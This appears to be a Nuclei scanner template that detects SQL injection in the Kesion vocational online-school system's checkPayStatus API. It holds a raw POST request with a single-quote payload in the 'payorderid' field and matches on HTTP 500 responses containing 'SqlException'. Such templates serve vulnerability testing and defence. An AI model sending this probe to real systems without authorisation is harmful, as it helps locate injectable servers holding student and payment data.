id: kesion-checkPayStatus-sqli
info:
  name: 科汛新职教网校系统 checkPayStatus 存在SQL注入
  author: leadlife
  severity: high
  description: 
  reference: 
    - https://vip.bdziyi.com/58459/
  classification:
    cve-id: 
  metadata:
    verified: true
    fofa-query: demo
    tips:
    repair:
    version:
  tags: kesion,sqli

http:
  - raw:
      - |
        POST /Webapi/Common/checkPayStatus HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.2246.54 Safari/537.36
        Content-Type: application/json
        Content-Length: 43

        {"payorderid":"1'","apptoken":"1"}
        
    matchers:
      - type: dsl
        dsl:
          - status_code == 500
          - contains_all(body,'SqlException')
        condition: and